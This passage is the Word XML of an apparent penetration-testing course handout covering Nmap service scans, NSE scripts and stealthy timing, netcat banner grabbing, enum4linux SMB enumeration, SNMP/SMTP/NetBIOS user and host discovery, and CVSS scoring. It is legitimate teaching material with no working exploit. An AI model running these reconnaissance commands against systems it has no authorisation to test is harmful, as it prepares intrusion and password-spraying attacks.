                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp   open  ssh         OpenSSH 4.7p1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">80/tcp   open  http        Apache httpd 2.2.8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Interpretation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each open port with a version string is a potential lead — for instance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd 2.3.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a well-known backdoored version (see Unit III), so this one line already points to a specific exploit to research.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.11 NSE Scripts and Timing Templates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scripting Engine (NSE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Lua-based framework that extends Nmap beyond plain port scanning, automating tasks like vulnerability checks and service enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--script=default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a safe, curated set of scripts (banner grabbing, basic enumeration), automatically included with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--script=vuln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — actively checks discovered services against known vulnerability signatures; more intrusive, useful for a first-pass vulnerability sweep.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Timing templates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-T0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-T5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> control scan speed: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-T0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is paranoid and slow (good for evading detection), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-T5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is fastest and most detectable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-T3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.12 Banner Grabbing with Netcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Banner grabbing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means manually connecting to an open port to read the service's own greeting message, confirming what Nmap reported in a lightweight, low-noise way.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nc -nv target.com 80</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HEAD / HTTP/1.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[press Enter twice]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.13 Network Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB Enumeration with enum4linux -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Server Message Block) is the Windows protocol for file/printer sharing and inter-process communication, typically on ports 139 and 445. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wraps classic Samba/Windows enumeration tools to automate the whole SMB recon workflow.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">enum4linux -a 192.168.56.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (“all”) flag runs a complete sweep in one pass, attempting to pull workgroup/domain info, usernames and RIDs, group membership, share names, password policy and OS information. An anonymous/“null session” on a poorly hardened SMB server can leak a full username list — directly fuelling a later password-spraying attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP Walking, SMTP Enumeration and NetBIOS</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2242"/>
        <w:gridCol w:w="1949"/>
        <w:gridCol w:w="5555"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Protocol / Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5555"/>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What It Reveals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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SNMP walking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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UDP 161 (community string, often default “public”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Interface lists, routing tables, installed software — by walking the entire MIB tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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SMTP enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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TCP 25 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">VRFY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">EXPN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> commands)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Mail servers may confirm whether a username is valid, letting an attacker build a list of real email accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="224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NetBIOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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UDP 137 / TCP 139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="555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Machine's NetBIOS name, workgroup and MAC address — correlates an IP to a hostname and domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.14 Reading the Scan Report and Building a Service Inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After scanning, results should be consolidated into a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">service inventory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: one row per host, listing IP, open ports, service/version and any obvious flags (default credentials, outdated version). This inventory is the raw material for the vulnerability scan and later for the report's Scope &amp; Methodology section.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.15 CVSS v3.1 Score Components</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2242"/>
        <w:gridCol w:w="7504"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7504"/>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Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Attack Vector (AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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How the vulnerability is reached: Network, Adjacent, Local, or Physical. Network-reachable issues score highest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Attack Complexity (AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Whether exploitation needs special conditions. Low = reliably exploitable; High = depends on factors outside the attacker's control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Privileges Required (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Access level the attacker needs before the attack: None, Low, or High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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User Interaction (UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Whether a victim must act (e.g. click a link): None or Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
